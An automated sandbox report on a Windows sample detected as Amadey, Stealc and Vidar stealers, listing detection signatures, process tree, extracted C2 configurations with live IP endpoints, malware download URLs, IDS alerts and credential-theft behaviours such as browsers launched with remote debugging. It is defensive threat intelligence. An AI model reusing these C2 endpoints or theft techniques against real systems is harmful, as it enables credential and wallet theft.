Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1570933
MD5:	8f8df73091164236b35ac3cad7969f87
SHA1:	ebf8688e3ab2e1cdf4b6822993e3e111cf8623ba
SHA256:	afd10002d57ad1cc0c4d7f195e9ed22d909d3774bdb65b0232f2f63cdbb70967
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files to the document folder of the user

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

Monitors registry run keys for changes

PE file contains section with special chars

Potentially malicious time measurement code found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7368 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 8F8DF73091164236B35AC3CAD7969F87)

chrome.exe (PID: 7864 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 8080 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=2200,i,1340459741847875032,4804373366831485818,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

msedge.exe (PID: 8688 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 8904 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2136,i,6607113195327049386,14986448368606126655,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

cmd.exe (PID: 8548 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JJECFIECBG.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

JJECFIECBG.exe (PID: 7904 cmdline: "C:\Users\user\Documents\JJECFIECBG.exe" MD5: 5CC1E2DF8F03CC33A15DDE12361499CF)

skotes.exe (PID: 6960 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 5CC1E2DF8F03CC33A15DDE12361499CF)

msedge.exe (PID: 8932 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 8264 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2092,i,10298190665720480491,4854320900994786694,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

skotes.exe (PID: 5332 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 5CC1E2DF8F03CC33A15DDE12361499CF)

60949160aa.exe (PID: 9088 cmdline: "C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe" MD5: 7366C5E55B0B2823487B875D11C5BE89)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000014.00000002.2819896687.0000000000701000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000013.00000002.2793029147.0000000000621000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000001.00000002.2760035051.00000000018C1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2758733046.000000000108C000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2758733046.0000000000FC1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000002.2760035051.000000000184E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000001.00000003.2185073918.0000000005440000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000016.00000002.3404324717.0000000000701000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: file.exe PID: 7368	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7368	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7368	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7368	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
19.2.JJECFIECBG.exe.620000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
20.2.skotes.exe.700000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
22.2.skotes.exe.700000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7368, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 7864, ProcessName: chrome.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T13:33:16.710833+0100	2028371	3	Unknown Traffic	192.168.2.6	50045	104.21.16.9	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T13:33:16.710833+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.6	50045	104.21.16.9	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T13:33:15.345654+0100	2057921	1	Domain Observed Used for C2 Detected	192.168.2.6	52822	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T13:31:19.225051+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.6	49724	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T13:31:19.096975+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.6	49724	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T13:31:19.550171+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.6	49724	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T13:31:21.000477+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.6	49724	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T13:31:19.678500+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.6	49724	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T13:31:18.645734+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	49724	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T13:33:06.013537+0100	2856147	1	A Network Trojan was detected	192.168.2.6	50019	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T13:31:05.849028+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.6	50028	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T13:33:10.453317+0100	2803305	3	Unknown Traffic	192.168.2.6	50031	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-08T13:31:21.722601+0100	2803304	3	Unknown Traffic	192.168.2.6	49724	185.215.113.206	80	TCP
2024-12-08T13:31:48.240293+0100	2803304	3	Unknown Traffic	192.168.2.6	49835	185.215.113.206	80	TCP
2024-12-08T13:31:50.405168+0100	2803304	3	Unknown Traffic	192.168.2.6	49835	185.215.113.206	80	TCP
2024-12-08T13:31:51.751980+0100	2803304	3	Unknown Traffic	192.168.2.6	49835	185.215.113.206	80	TCP
2024-12-08T13:31:53.269125+0100	2803304	3	Unknown Traffic	192.168.2.6	49835	185.215.113.206	80	TCP
2024-12-08T13:31:56.725423+0100	2803304	3	Unknown Traffic	192.168.2.6	49835	185.215.113.206	80	TCP
2024-12-08T13:31:57.975382+0100	2803304	3	Unknown Traffic	192.168.2.6	49835	185.215.113.206	80	TCP
2024-12-08T13:32:03.785611+0100	2803304	3	Unknown Traffic	192.168.2.6	49875	185.215.113.16	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.16/luma/random.exe613	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/freebl3.dllH	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dllX	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpDA	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dllV	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php----GV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8Kn	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\Documents\JJECFIECBG.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Found malware configuration

Source: 00000014.00000002.2819896687.0000000000701000.00000040.00000001.01000000.0000000D.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: file.exe.7368.1.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 48%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\JJECFIECBG.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1013180001\60949160aa.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C976C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	1_2_6C976C80
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CACA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	1_2_6CACA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAC44C0 PK11_PubEncrypt,	1_2_6CAC44C0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CA94420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	1_2_6CA94420
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAC4440 PK11_PrivDecrypt,	1_2_6CAC4440
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CB125B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	1_2_6CB125B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAAE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	1_2_6CAAE6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAA8670 PK11_ExportEncryptedPrivKeyInfo,	1_2_6CAA8670
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CACA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	1_2_6CACA650
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAEA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	1_2_6CAEA730
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAF0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	1_2_6CAF0180
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6CAC43B0 PK11_PubEncryptPKCS1,PR_SetError,	1_2_6CAC43B0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 40.126.53.11:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.53.11:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.206.197.26:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.234.120.54:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.206.197.42:443 -> 192.168.2.6:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49901 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:50045 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000001.00000002.2772567860.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000001.00000002.2772567860.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 9MB later: 30MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49724 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49724 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.6:49724
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49724 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.6:49724
